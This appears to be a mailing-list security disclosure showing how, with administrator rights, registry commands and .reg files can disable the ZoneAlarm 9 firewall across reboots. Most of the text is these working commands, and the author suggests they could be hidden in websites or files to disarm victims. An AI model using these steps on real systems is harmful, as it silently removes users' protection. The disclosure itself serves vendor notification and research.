ZoneAlarm 9 (ForceField) Security Disclosure
Hi,
This disclosure pertains to ZoneAlarm 9 (ForceField). ZoneAlarm have been=
informed. The following discusses similar issues as was previously disclo=
sed
regarding ZoneAlarm 8.
ZoneAlarm 9 (ForceField)
ZoneAlarm version:9.1.007.002
TrueVector version:9.1.007.002
Driver version:9.1.007.002
Introduction
The following illustrates how one can easily disable ZoneAlarm's security=
for
whatever purposes. When "exploiting" this (administrative privileges are
assumed) and the system rebooted, ZoneAlarm will be disarmed. I've tested=
this
on various XP platforms successfully. Please let me know your thoughts on=
this.
Impact
This particular "vector" opens the door for "exploitation" via social mea=
ns,
thus unwitting victims may not even realise that their security has been
disabled, leaving them exposed and unprotected. What if the following sim=
ple
"proof of concept" was embedded (obfuscated/scripted/automated) within a
website, executable, document etc; and via social means you unsuspectingl=
y
executed it? ZoneAlarm would be disarmed, leaving you exposed and
unprotected.
Preliminaries
Firstly setup a continuous ping or similar to the system being tested, so=
as
to verify that ZoneAlarm is working and blocking these.
Step-by-step illustration
1) Firstly make a backup copy of the "Run" key (i.e. Runs).
NOTE: This step is actually not required, however, will look less suspici=
ous
in the Task Manager. You could in fact just execute steps (2) and (5) & (=
6) if
you wish.
i.e. Command prompt
reg copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /s /f
2) Then use the following 'brute-force' method to delete the "Run" key.
ZoneAlarm 'locks' "ZoneAlarm Client" (zclient.exe), which ultimately cont=
rols
& depends on "vsdatant.sys".
NOTE: There is a - prepended to [HKEY] this is intentional. You need to c=
reate
a registry file (.reg) with the following entries and execute.
NOTE: Creating & executing the following registry file (.reg), may cause
ZoneAlarm to panic, if so you may (or may not) see your ping replies.
*** Registry entries start here ***
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
*** Registry entries end here ***
3) Delete (if exist) the "ZoneAlarm Clients" entries from the backup key
(Runs).
i.e. Command prompt
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /v "ZoneAl=
arm
Client" /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /v "ISW" /=
f
4) Restore the backup key (Runs) to the original Key "Run". The whole
objective here really is just to rid the "ZoneAlarm Client" (zclient.exe)=
,
thus "vsdatant.sys" is now vulnerable.
i.e. Command prompt
reg copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s /f
5) Create the following registry keys, or registry file (.reg), execute a=
nd
reboot.
NOTE: After rebooting, you may find that any egress traffic that used to
prompt for access, now no longer prompts.
*** Registry entries start here ***
Windows Registry Editor Version 5.00
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_VSDATANT\0=
000]
"CSConfigFlags"=3Ddword:00000001
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_ISWKL\0000=
]
"CSConfigFlags"=3Ddword:00000001
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_ISWSVC\000=
0]
"CSConfigFlags"=3Ddword:00000001
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_VSMON\0000=
]
"CSConfigFlags"=3Ddword:00000001
*** Registry entries end here ***
6) After and having rebooted in the previous step (5), and now that
"vsdatant.sys" is vulnerable, re-run step (5) again (including reboot).
ZoneAlarm should completely be disarmed and all traffic passing freely.
NOTE: This step may (or may not) be required so as to persistently disabl=
e
"vsdatant.sys".
Cheers
Andrew Barkley
(-_-)